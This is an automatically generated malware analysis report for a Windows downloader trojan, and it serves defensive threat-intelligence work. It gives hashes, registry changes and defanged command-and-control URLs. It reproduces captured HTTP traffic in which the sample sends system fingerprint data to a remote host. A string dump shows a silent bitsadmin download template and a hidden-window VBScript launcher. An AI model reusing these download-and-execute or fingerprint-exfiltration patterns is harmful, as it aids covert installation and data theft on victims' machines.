Trojan.Win32.Swrort.3_096bbef611

by malwarelabrobot on April 15th, 2017 in Malware Descriptions.

Application.Bundler.AGY (BitDefender), not-a-virus:HEUR:Downloader.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Application.Bundler.AGY (B) (Emsisoft), Artemis!096BBEF61148 (McAfee), Trojan.Gen.2 (Symantec), Application.Bundler.AGY (FSecure), Generic_s.LP (AVG), Win32:Malware-gen (Avast), Trojan.Win32.Swrort.3.FD (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 096bbef6114828c8acc87738b932e3a9
SHA1: 4f5c7684abb06caa20d8b8e1ac8f3ff1a56253d1
SHA256: 097e27cabf8b01ebc5d80b49ac82eba5e96b2c9db162b719db74b4800da04e34
SSDeep: 12288:7fLASGxPQ1aIK4i6W9y9vUeYKelEvGk/IMQgdLKbGLyDUrPj5hegf DmOeHdikxD:TLAxiEWUeZeGfXQsaUD3LjVUkxjmM
Size: 735744 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-11-09 18:40:29
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2180

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\FailedToInstall[1].htm (715 bytes)

Registry activity

The process %original file name%.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "30 F1 C9 F3 1E B5 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\096bbef6114828c8acc87738b932e3a9_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 F1 C9 F3 1E B5 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 346504 346624 5.51632 aa057344240fd6487a72fba120499933
.data 352256 351436 351744 5.52761 9d1cb335d87a84c5663a37b244a57013
/8 704512 8704 8704 4.48774 43d8bccf251da8eedf9dfc92ac4f8913
/16 716800 8704 8704 4.48721 6ec91f04ee684a818f729f7ea949789d
.rdata 729088 512 512 4.41648 6b2f4a661f97d649ff7c935a5657851f
.bss 733184 1024 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 737280 6600 6656 3.82946 c5778561a7e2a20d421c4a759eb61b78
.tls 745472 44 512 0.138011 13a373a59300fddf417d94b48d859c91
.rsrc 749568 11152 11264 4.07556 42240e48d46d005f382e13b77db31808

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 194
af79a74ef7785cda5f657a71c3ef1a29
24082627bf42bc28339f50287f003597
f689437c730f88e5bb25c63455bc2e76
2c19c4e718fc58b7d0d33b4b0e85de11
b3a7eb0b361569a004e00a2e5db88595
fa168e3cd32e2b537e1121638c033e52
ae10862b03ca6f78126029436b675ecf
6382ec0de08e1f4b9ac2b1bb456479f5
36accb6d7b3d73e555dd0b055932664f
6760ea60b454f845184ede91a002d04a
c5259de3fe59814630414dcaa4aef97f
ca8155d269e66ceba01b36386b343b96
8da685d9011e7fdf4632c995942294b1
2879f6c4a47af17cb1cf8e1cf2599cc2
58a98de3d8e04200d673a620cf961f7c
725fdcf5cb8879d456d32e5a189bf9c7
ee31956fcbf5afc9af123c79360f99c4
aea136e8d2cb6faa0d8b7bc72b81f66e
94ad53032482b23fe66b696ceed2e8d7
e9d7b2c6bf6ae4419e0e003eeca50e91
c6d6f4e58c839be855ef0435d9e50dac
5b1db0af61c914cd8f1cbf3e76f80fce
4f020c82fb71d1f4ef1b9157b1c6263e
8113384b9ffc041ce7cb3ab7ea9c8cc7
275368474cad00658e56ca18de1f2e68
e5824777180fdea139687d03ee5f5b48

URLs

URL IP
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/FailedToInstall.php?reason=8&version=1.1.5.26
teredo.ipv6.microsoft.com 157.56.106.189
www.millesimalnonremuneration.site 107.20.147.93


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Content-Length: 557
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=%original file name%.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=096bbef6114828c8acc87738b932e3a9&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1492174766&ver=1.1.5.26
HTTP/1.1 302 Moved
Content-Type: text/html; charset=UTF-8
Date: Fri, 14 Apr 2017 12:59:29 GMT
Location: /FailedToInstall.php?reason=8&version=1.1.5.26
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 120
Connection: keep-alive
....<HTML>.<HEAD>.<TITLE>Failed to install software&
lt;/TITLE>.</HEAD>.<BODY>.Failed to install software .&
lt;/BODY>.</HTML>
....



GET /FailedToInstall.php?reason=8&version=1.1.5.26 HTTP/1.1

Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 14 Apr 2017 12:59:29 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 715
Connection: keep-alive
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">..
<html>..<head>..<title>Installation failure</titl
e>..<script type="text/javascript">..var g_amiobj = '', g_ami
;..function AmiFail(){...try...{...if(g_amiobj)eval('g_ami=' g_amiob
j);...else g_ami = window.external;...g_ami.ShowMe(1);...alert('Instal
lation failed, reason="8"');...g_ami.RequestExit(0);...}...catch(ex){}
..}..</script></head>..<body onload="AmiFail()">..&
lt;h3>Unable to install software (1.1.5.26) due to following reason
(s)</h3>..<ul style="width:100%; font-weight:bolder;list-styl
e-type:square;">..<li style="list-style-position:inside; font-we
ight:normal;">Legacy .Net Framework 1.1 version unsufficient</li
></ul>..</body>..</html>HTTP/1.1 200 OK..Content-
Type: text/html; charset=UTF-8..Date: Fri, 14 Apr 2017 12:59:29 GMT..S
erver: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Lengt
h: 715..Connection: keep-alive..<!doctype html public "-//w3c//dtd
html 4.0 transitional//en">..<html>..<head>..<title&
gt;Installation failure</title>..<script type="text/javascrip
t">..var g_amiobj = '', g_ami;..function AmiFail(){...try...{...if(
g_amiobj)eval('g_ami=' g_amiobj);...else g_ami = window.external;...
g_ami.ShowMe(1);...alert('Installation failed, reason="8"');...g_ami.R
equestExit(0);...}...catch(ex){}..}..</script></head>..<
;body onload="AmiFail()">..<h3>Unable to install softwar

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2180:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
.hx?G
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Sending request %S
%S - transfer terminated
Error %d transferring %S
Status code %d returned from %S
Trying to redirect from %S to %S
AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d
Query Data: Error %d encountered (%S)
Read Data: Error %d encountered (%S)
AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.
WinHttpGetIEProxyConfigForCurrentUser
CBoot::OnShowTrayNotification(UM_USERSHOWNOTIFY %d, %d )
CBoot::OnTimer: end installation timer to %d minutes elapsed. Send ThankYou and close.
CBoot::OnUserMsgPercept(%d, %d, %d )
CBoot::OnUserMsgShowInit(UM_USERSHOWINIT %d, %d )
CBoot::OnInitDialog: query = %S
CBoot::OnInitDialog, next monetization file exists: %ls, delete it with result %d
CBoot::RemoveFromCompList(name=%S)
CBoot::AddToCompList(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall set end installation timer to %d minutes
CBoot::AsyncStartDownloadAndInstall3(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld, rate=%lf)
CBoot::AsyncStartDownloadAndInstall2(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall2 set end installation timer to %d minutes
CBoot::AsyncStartDownload2(shortName=%S, url=%S, url2=%S)
CBoot::EnableInstallation(%d, %S, %S, %d)
CBoot::RequestExit(%d)
10u page URL: %S post data %S
Resume link created at: '%S'
DestroyIcon: %S
DestroyIcon: File '%S' deleted
DestroyIcon: Fail to delete file '%S' code %d
SHFileOperationW
DestroyIcon: SHFileOperationW rc=%d
CBoot::ShowMe doShow=%d
WriteRegistryInt - returned %d
Failed to create upd object 0X%X
CBoot::RunResource %S %S
CBoot::SetThanksParameter: thankParams[%S] = %S
CBoot::CreateDownloadScheduleTask: %S '%S' '%S' %ld
Failed to get the Temp folder: %d
Boot::CreateDownloadScheduleTask: Failed to create a download task for %S
CBoot::CreateDownloadScheduleTask: Failed to create an install task for %S
CBoot::CreateDownloadScheduleTask: Failed to create a download task for %S
CBoot::CreateDeleteScheduleTask: Failed to create a delete task for %S
CBoot::CreateDownloadScheduleTask: Download and install tasks were created for %S
CBoot::UpdateProgress %S %ld %S %ld %ld
CBoot::UpdateProgress Create new progreess request for %S
CBoot::UpdateProgress Failed to create a new progreess request for %S
ShellExecuteExW
Term. wait %d
Fatal error X initializing UI
Term.thread created %d
Main thread %d ended %d
CDownload::CDownload Resource for %S loaded
CDownload::CDownload Resource for %S written to %S
CDownload::CDownload Resource for %S set installExe %S
Failed to run %S - component skipped
CDownload::ReadyToInstall %S
Failed to run %S - unsupported type %d
CDownload::EnableInstallation(%S, %S, %d)
CDownload::EnableInstallation return %s
CDownload::Install started m_id=%d shortName=%S
CDownload::Install Failed to delete file %S , error %d
CDownload::Install Error on CreateDirectory %S , error %d
CDownload::Install Change file name %S
CDownload::Install Failed to move temp file '%S' to %S , error %d
CDownload::Install DownloadType=%d
%S Running for %S: '%S' '%S'
CDownload::Install Trying to open folder (%S) containing zip , error %d
CDownload::Install Failed to run (%S) , error %d
%S BEFORE activating Wait4TreeThread %d %d
%S ACTIVATING Wait4TreeThread %d %d
%S AFTER activating Wait4TreeThread %d %d nCount %d
CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessEnded
CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessTreeEnded
CDownload::Install Child process for %S (id %d) ended, RC=%d, status=%d
Wait 4 3 skipped for %S
CDownload::Install Ended for m_id=%d shortName=%S
Process 3 for %S (id %d) empty
Timeout waiting for process 3 %S (id %d)
Process tree for %S ended
Looking for processes tree of %d: parents size %d, pending size %d
%S running, wait for %S ended
3 for %d: parents size %d, pending size %d rc=%d
CDownload::SetState for '%S' is %d
CDownload::AddThanksParameter p=%S v=%d
HtmlDialog::GetIDsOfNames(NOT IMPLEMENTED %S)
JsLog: %S
CInstallationManager::IntOnDownloadCompleted: Download id=%d ShortName=%S
CInstallationManager::IntOnDownloadCompleted Id %d download ended OK
CInstallationManager::IntOnDownloadCompleted Id %d assigned to %S, retry state %d
CInstallationManager::IntOnDownloadCompleted Status=%d for component_id=%d, error=%d
CInstallationManager::EnqueueInstallation ReadyToInstall %S
CInstallationManager::EnqueueInstallation Error on ReadyToInstall %S
CInstallationManager::Download(%S, %S, %S)
CInstallationManager::Install(%d, %S, %S,%d)
CInstallationManager::IntDownload(%S, %S, %S,%d)
CInstallationManager::IntDownload Id %d assigned to %S, state=%d
CInstallationManager::IntDownload Id %d assigned to %S, state=%d(retry)
CInstallationManager::IntDownload state == dst_DownloadEndedError s_hTotalDownloadErrors=%d
CInstallationManager::IntDownload s_hTotalDownloadErrors %d
CInstallationManager::IntDownload: Adding CDownload for %S to m_downloads)
CInstallationManager::IntInstall(id=%d, installCmdLine=%S, ProcessName=%S, installMode=%d)
%d postponed runs released
CInstallationManager::IntReleasePostponed Add %S to the end of the list
ReleasePostponed %S
CInstallationManager::RemovePossibleComponents %S removed from list
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
Temp file %S moved to %S, success %d
Key %X/%S opened, error %d
Value %S written, error %d
RegCreateKeyTransactedW
RegOpenKeyExA
RegCloseKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion
RegOpenKeyTransactedW
CTaskScheduleHandler::CreateNewTask Failed to create an instance of ITaskService: %x
CTaskScheduleHandler::CreateNewTask ITaskService::Connect failed: %x
CTaskScheduleHandler::CreateNewTask Cannot get Root folder pointer: %x
CTaskScheduleHandler::CreateNewTask Failed to CoCreate an instance of the TaskService class: %x
CTaskScheduleHandler::CreateNewTask Cannot get identification pointer: %x
CTaskScheduleHandler::CreateNewTask Cannot put identification info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get principal pointer: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put RunLevel principal info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put LogonType principal info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get settings pointer: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put setting hidden information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put setting information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get idle setting information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put idle setting information: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot get trigger collection: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot create trigger: %x
CTaskScheduleHandler::CreateTaskTrigger QueryInterface call failed for ITimeTrigger: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot put trigger ID: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot put end boundary on trigger: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot add start boundary to trigger: %x
CTaskScheduleHandler::SaveTask Error saving the Task: %x
CTaskScheduleHandler::SaveTask Cannot get Task collection pointer: %x
CTaskScheduleHandler::SaveTask Cannot create the action: %x
CTaskScheduleHandler::SaveTask QueryInterface call failed for IExecAction: %x
CTaskScheduleHandler::SaveTask Cannot put action path: %x
CTaskScheduleHandler::SaveTask Cannot put action arguments: %x
CTaskScheduleHandler::CreateDownloadTask Cannot create a new task: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add registration info: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add security credentials: %x
CTaskScheduleHandler::CreateDownloadTask Failed to create an instance of ITaskService: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add trigger: %x
CTaskScheduleHandler::CreateDownloadTask Cannot create the download action: %x
CTaskScheduleHandler::CreateDownloadTask Fail to save the task: %x
CTaskScheduleHandler::CreateInstallTask Cannot create a new task: %x
CTaskScheduleHandler::CreateInstallTask Fail to add registration info: %x
CTaskScheduleHandler::CreateInstallTask Fail to add security credentials: %x
CTaskScheduleHandler::CreateInstallTask Fail to add settings: %x
CTaskScheduleHandler::CreateInstallTask Fail to add trigger: %x
CTaskScheduleHandler::CreateInstallTask Cannot create the execute action: %x
CTaskScheduleHandler::CreateInstallTask Cannot create the delete action: %x
CTaskScheduleHandler::CreateInstallTask Fail to save the task: %x
"'\?<>&= %,/:!#$;[]()
Process=%S command=%S verb=%S, result=%d
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUDWebBrowserEvents2@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
9%9s9
:(:2:8:\:
4,4}4'5.5
5!5'565?5
5'5/555<5
=&=.=6=\=
7 7@7`7|7
= =<=@=`=
ðI**
%0U1D6V
%U1 0
.4O6%S0WQ IT
6.WIH
-<X<>
9K'L.0G@ÅJ
J40.XE
O4I.LX(!F
CreateDialogIndirectParamW
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyboardState
GetKeyState
dbghelp.dll
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
Dole32.dll
WContent-Type: application/x-www-form-urlencoded
hXXp://VVV.%s/index.php
ficbetaglucose.site
appimageurl
InternetExplorer.Application
cmdl
Network error (%d) encountered, install aborted
debug.html
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
W\Support Tools\bitsadmin.exe
:?*\"'/.
:Zone.Identifier
%s\%s.lnk
%s\*%s*.lnk
%samipixel.cfg
%sami*.tmp.ico
%s%s*.exe
dream.capture
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
c[%s][%s]
/retrynav %d
shell32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%TEMP%\amilog.txt
&You are about to exit the installation. Click OK to Exit and install %s including other optional programs.
&Resume installation on next Windows startup
.exe.msi.zip.xap.bat
%Windir%\System32\msiexec.exe
/i "%s"
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
/install:"%s" /origin:%s
kernel32.dll
CheckRegKey
BestReaderCheckRegKey
IsShortNameInstalled
sn=%s&hx=%S&base=%s
rfsw%d
BAdvapi32.dll
advapi32.dll
Iphlpapi.dll
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("%s",0,False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel %s",0,False)
%%X
Wversion.dll
OleAut32.dll
c:\%original file name%.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
millesimalnonremuneration.site

%original file name%.exe_2180_rwx_003B0000_00002000:

.text
`.rdata
@.data
.reloc
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.data
KERNEL32.dll

%original file name%.exe_2180_rwx_003C0000_00005000:

.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.data
KERNEL32.dll

%original file name%.exe_2180_rwx_00400000_000AC000:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
.hx?G
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Sending request %S
%S - transfer terminated
Error %d transferring %S
Status code %d returned from %S
Trying to redirect from %S to %S
AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d
Query Data: Error %d encountered (%S)
Read Data: Error %d encountered (%S)
AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.
WinHttpGetIEProxyConfigForCurrentUser
CBoot::OnShowTrayNotification(UM_USERSHOWNOTIFY %d, %d )
CBoot::OnTimer: end installation timer to %d minutes elapsed. Send ThankYou and close.
CBoot::OnUserMsgPercept(%d, %d, %d )
CBoot::OnUserMsgShowInit(UM_USERSHOWINIT %d, %d )
CBoot::OnInitDialog: query = %S
CBoot::OnInitDialog, next monetization file exists: %ls, delete it with result %d
CBoot::RemoveFromCompList(name=%S)
CBoot::AddToCompList(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall set end installation timer to %d minutes
CBoot::AsyncStartDownloadAndInstall3(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld, rate=%lf)
CBoot::AsyncStartDownloadAndInstall2(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)
CBoot::AsyncStartDownloadAndInstall2 set end installation timer to %d minutes
CBoot::AsyncStartDownload2(shortName=%S, url=%S, url2=%S)
CBoot::EnableInstallation(%d, %S, %S, %d)
CBoot::RequestExit(%d)
10u page URL: %S post data %S
Resume link created at: '%S'
DestroyIcon: %S
DestroyIcon: File '%S' deleted
DestroyIcon: Fail to delete file '%S' code %d
SHFileOperationW
DestroyIcon: SHFileOperationW rc=%d
CBoot::ShowMe doShow=%d
WriteRegistryInt - returned %d
Failed to create upd object 0X%X
CBoot::RunResource %S %S
CBoot::SetThanksParameter: thankParams[%S] = %S
CBoot::CreateDownloadScheduleTask: %S '%S' '%S' %ld
Failed to get the Temp folder: %d
Boot::CreateDownloadScheduleTask: Failed to create a download task for %S
CBoot::CreateDownloadScheduleTask: Failed to create an install task for %S
CBoot::CreateDownloadScheduleTask: Failed to create a download task for %S
CBoot::CreateDeleteScheduleTask: Failed to create a delete task for %S
CBoot::CreateDownloadScheduleTask: Download and install tasks were created for %S
CBoot::UpdateProgress %S %ld %S %ld %ld
CBoot::UpdateProgress Create new progreess request for %S
CBoot::UpdateProgress Failed to create a new progreess request for %S
ShellExecuteExW
Term. wait %d
Fatal error X initializing UI
Term.thread created %d
Main thread %d ended %d
CDownload::CDownload Resource for %S loaded
CDownload::CDownload Resource for %S written to %S
CDownload::CDownload Resource for %S set installExe %S
Failed to run %S - component skipped
CDownload::ReadyToInstall %S
Failed to run %S - unsupported type %d
CDownload::EnableInstallation(%S, %S, %d)
CDownload::EnableInstallation return %s
